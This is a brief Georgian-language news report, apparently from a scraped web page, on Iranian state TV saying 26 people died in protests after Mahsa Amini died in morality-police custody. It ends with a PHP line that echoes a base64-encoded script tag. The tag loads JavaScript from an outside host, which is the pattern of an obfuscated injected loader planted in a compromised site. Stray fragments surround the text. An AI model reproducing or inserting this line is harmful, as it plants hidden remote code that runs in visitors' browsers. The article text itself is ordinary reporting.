celsiusi
ავერსი შნაიდერი
ირანის სახელმწიფო ტელევიზიის ინფორმაციით, საპროტესტო აქციებზე 26 ადამიანი დაიღუპა. 
 
მედიაში გავრცელებული ინფორმაციით, გარდაცვლილთა შორისაა რამდენიმე პოლიციელიც.
 
შეგახსენებთ, რომ ირანში საპროტესტო აქციები მაჰსა ამინის გარდაცვალების შემდეგ დაიწყო.
 
ამინი თეირანში 13 სექტემბერს მორალის პოლიციამ ჰიჯაბის ტარების წესების დარღვევისთვის დააპატიმრა.
 
დაკავებიდან რამდენიმე საათში მის ოჯახს შეატყობინეს, რომ ამინი საავადმყოფოში გადაიყვანეს, სადაც სამ დღეში გარდაიცვალა.ირანის ხელისუფლება ამტკიცებს, რომ მას ჯანმრთელობის პრობლემები ჰქონდა, გარდაცვლილის ოჯახი კი ამბობს, რომ გოგონა ძალადობის მსხვერპლი გახდა.
341
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");